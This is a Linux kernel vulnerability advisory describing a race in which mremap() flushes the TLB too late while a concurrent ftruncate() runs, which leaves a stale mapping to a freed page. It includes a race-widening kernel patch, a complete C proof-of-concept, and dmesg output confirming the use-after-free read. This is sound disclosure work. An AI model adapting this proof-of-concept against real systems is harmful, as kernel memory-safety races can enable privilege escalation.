Linux mremap() TLB Flush Too Late

Linux has an issue where mremap() performs a TLB flush too late with concurrent ftruncate().

MD5 | 662f158d83c31c10c9b25a7d01c09b0a

Linux: mremap() TLB flush too late with concurrent ftruncate() 


Tested on the master branch (4.19.0-rc7+).

sys_mremap() takes current->mm->mmap_sem for writing, then calls
mremap_to()->move_vma()->move_page_tables(). move_page_tables() first
calls move_ptes() (which takes PTE locks, moves PTEs, and drops PTE
locks) in a loop, then performs a TLB flush with flush_tlb_range().
move_ptes() can also perform TLB flushes, but only when dirty PTEs are
encountered - non-dirty, accessed PTEs don't trigger such early flushes.
Between the move_ptes() loop and the TLB flush, the only lock being
held in move_page_tables() is current->mm->mmap_sem.

->zap_page_range_single() can concurrently access the page tables of a
process that is in move_page_tables(), between the move_ptes() loop
and the TLB flush.

The following race can occur in a process with three threads A, B and C:

A: maps a file of size 0x1000 at address X, with PROT_READ and MAP_SHARED
C: starts reading from address X in a busyloop
A: starts an mremap() call that remaps from X to Y; syscall progresses
until directly before the flush_tlb_range() call in
[at this point, the PTE for X is gone, but C still has a read-only TLB
entry for X; the PTE for Y has been created]
B: uses sys_ftruncate() to change the file size to zero. this removes
the PTE for address Y, then sends a TLB flush IPI *for address Y*.
TLB entries *for address X* stays alive.

The kernel now assumes that the page is not referenced by any
userspace task anymore, but actually, thread C can still use the stale
TLB entry at address X to read from it.

At this point, the page can be freed as soon as it disappears from the
LRU list (which I don't really understand); it looks like there are
various kernel interfaces that can be used to trigger
lru_add_drain_all(). For simplicitly, I am using root privileges to
write to /proc/sys/vm/compact_memory in order to trigger this.

To test this, I configured my kernel with PAGE_TABLE_ISOLATION=n,
commandline flag "page_poison=1". I patched the kernel as follows to
widen the race window (and make debugging easier). A copy of the patch
is attached.

diff --git a/arch/x86/mm/tlb.c b/arch/x86/mm/tlb.c
index e96b99eb800c..8156628a6204 100644
--- a/arch/x86/mm/tlb.c
+++ b/arch/x86/mm/tlb.c
@@ -567,6 +567,11 @@ static void flush_tlb_func_remote(void *info)
if (f->mm && f->mm != this_cpu_read(cpu_tlbstate.loaded_mm))

+ if (strcmp(current->comm, "race2") == 0) {
+ pr_warn("remotely-triggered TLB shootdown: start=0x%lx end=0x%lx\n",
+ f->start, f->end);
+ }
flush_tlb_func_common(f, false, TLB_REMOTE_SHOOTDOWN);
diff --git a/mm/compaction.c b/mm/compaction.c
index faca45ebe62d..27594b4868ec 100644
--- a/mm/compaction.c
+++ b/mm/compaction.c
@@ -1852,11 +1852,15 @@ static void compact_nodes(void)
int nid;

+ pr_warn("compact_nodes entry\n");
/* Flush pending updates to the LRU lists */

+ pr_warn("compact_nodes exit\n");

/* The written value is actually unused, all memory is compacted */
diff --git a/mm/mremap.c b/mm/mremap.c
index 5c2e18505f75..be34e0a7258e 100644
--- a/mm/mremap.c
+++ b/mm/mremap.c
@@ -186,6 +186,7 @@ static void move_ptes(struct vm_area_struct *vma, pmd_t *old_pmd,
flush_tlb_range(vma, old_end - len, old_end);
*need_flush = true;
pte_unmap_unlock(old_pte - 1, old_ptl);
if (need_rmap_locks)
@@ -248,8 +249,18 @@ unsigned long move_page_tables(struct vm_area_struct *vma,
move_ptes(vma, old_pmd, old_addr, old_addr + extent, new_vma,
new_pmd, new_addr, need_rmap_locks, &need_flush);
- if (need_flush)
+ if (need_flush) {
+ if (strcmp(current->comm, "race") == 0) {
+ int i;
+ pr_warn("spinning before flush\n");
+ for (i=0; i<100000000; i++) barrier();
+ pr_warn("spinning before flush done\n");
+ }
flush_tlb_range(vma, old_end-len, old_addr);
+ if (strcmp(current->comm, "race") == 0) {
+ pr_warn("flush done\n");
+ }
+ }

mmu_notifier_invalidate_range_end(vma->vm_mm, mmun_start, mmun_end);

diff --git a/mm/page_poison.c b/mm/page_poison.c
index aa2b3d34e8ea..5ffe8b998573 100644
--- a/mm/page_poison.c
+++ b/mm/page_poison.c
@@ -34,6 +34,10 @@ static void poison_page(struct page *page)
void *addr = kmap_atomic(page);

+ if (*(unsigned long *)addr == 0x4141414141414141UL) {
+ }
memset(addr, PAGE_POISON, PAGE_SIZE);
diff --git a/mm/shmem.c b/mm/shmem.c
index 446942677cd4..838b5f77cc0e 100644
--- a/mm/shmem.c
+++ b/mm/shmem.c
@@ -1043,6 +1043,11 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)
if (newsize <= oldsize) {
loff_t holebegin = round_up(newsize, PAGE_SIZE);
+ if (strcmp(current->comm, "race") == 0) {
+ pr_warn("shmem_setattr entry\n");
+ }
if (oldsize > holebegin)
holebegin, 0, 1);
@@ -1054,6 +1059,10 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)
holebegin, 0, 1);

+ if (strcmp(current->comm, "race") == 0) {
+ pr_warn("shmem_setattr exit\n");
+ }
* Part of the huge page can be beyond i_size: subject
* to shrink under memory pressure.

Then, I ran the following testcase a few times (compile with
"gcc -O2 -o race race.c -pthread"; note that the filename matters for
the kernel patch):

#define _GNU_SOURCE
#include <pthread.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/prctl.h>

#define ul unsigned long

static int alloc_fd = -1;
#define allocptr ((ul *)0x100000000000)
#define allocptr2 ((ul *)0x100000002000)

void *reader_fn(void *dummy) {
prctl(PR_SET_NAME, "race2");
while (1) {
ul x = *(volatile ul *)allocptr;
if (x != 0x4141414141414141UL) {
printf("GOT 0x%016lx\n", x);

void *truncate_fn(void *dummy) {
if (ftruncate(alloc_fd, 0)) err(1, "ftruncate");
int sysctl_fd = open("/proc/sys/vm/compact_memory", O_WRONLY);
if (sysctl_fd == -1) err(1, "unable to open sysctl");
write(sysctl_fd, "1", 1);
return 0;

int main(void) {
alloc_fd = open("/dev/shm/race_demo", O_RDWR|O_CREAT|O_TRUNC, 0600);
if (alloc_fd == -1) err(1, "open");
char buf[0x1000];
memset(buf, 0x41, sizeof(buf));
if (write(alloc_fd, buf, sizeof(buf)) != sizeof(buf)) err(1, "write");
if (mmap(allocptr, 0x1000, PROT_READ, MAP_SHARED, alloc_fd, 0) != allocptr) err(1, "mmap");

pthread_t reader;
if (pthread_create(&reader, NULL, reader_fn, NULL)) errx(1, "thread");

pthread_t truncator;
if (pthread_create(&truncator, NULL, truncate_fn, NULL)) err(1, "thread2");

if (mremap(allocptr, 0x1000, 0x1000, MREMAP_FIXED|MREMAP_MAYMOVE, allocptr2) != allocptr2) err(1, "mremap");
return 0;

After a few attempts, I get the following output:

user@debian:~/mremap_ftruncate_race$ sudo ./race
GOT 0xaaaaaaaaaaaaaaaa
Segmentation fault

Note that 0xaaaaaaaaaaaaaaaa is PAGE_POISON.

dmesg reports:
shmem_setattr entry
shmem_setattr exit
spinning before flush
shmem_setattr entry
remotely-triggered TLB shootdown: start=0x100000002000 end=0x100000003000
shmem_setattr exit
compact_nodes entry
------------[ cut here ]------------
WARNING: CPU: 5 PID: 1334 at mm/page_poison.c:38 kernel_poison_pages+0x10a/0x180
Modules linked in: btrfs xor zstd_compress raid6_pq
CPU: 5 PID: 1334 Comm: kworker/5:1 Tainted: G W 4.19.0-rc7+ #188
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
Workqueue: mm_percpu_wq lru_add_drain_per_cpu
RIP: 0010:kernel_poison_pages+0x10a/0x180
Call Trace:
? __mod_zone_page_state+0x66/0xa0
? pagevec_move_tail_fn+0x2b0/0x2b0
? process_one_work+0x400/0x400
? kthread_create_worker_on_cpu+0x70/0x70
---[ end trace aed8d7b167ea0097 ]---
compact_nodes exit
spinning before flush done
flush done
race2[1430]: segfault at 100000000000 ip 000055f56e711b98 sp 00007f02d7823f40 error 4 in race[55f56e711000+1000]

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Found by: jannh

Related Posts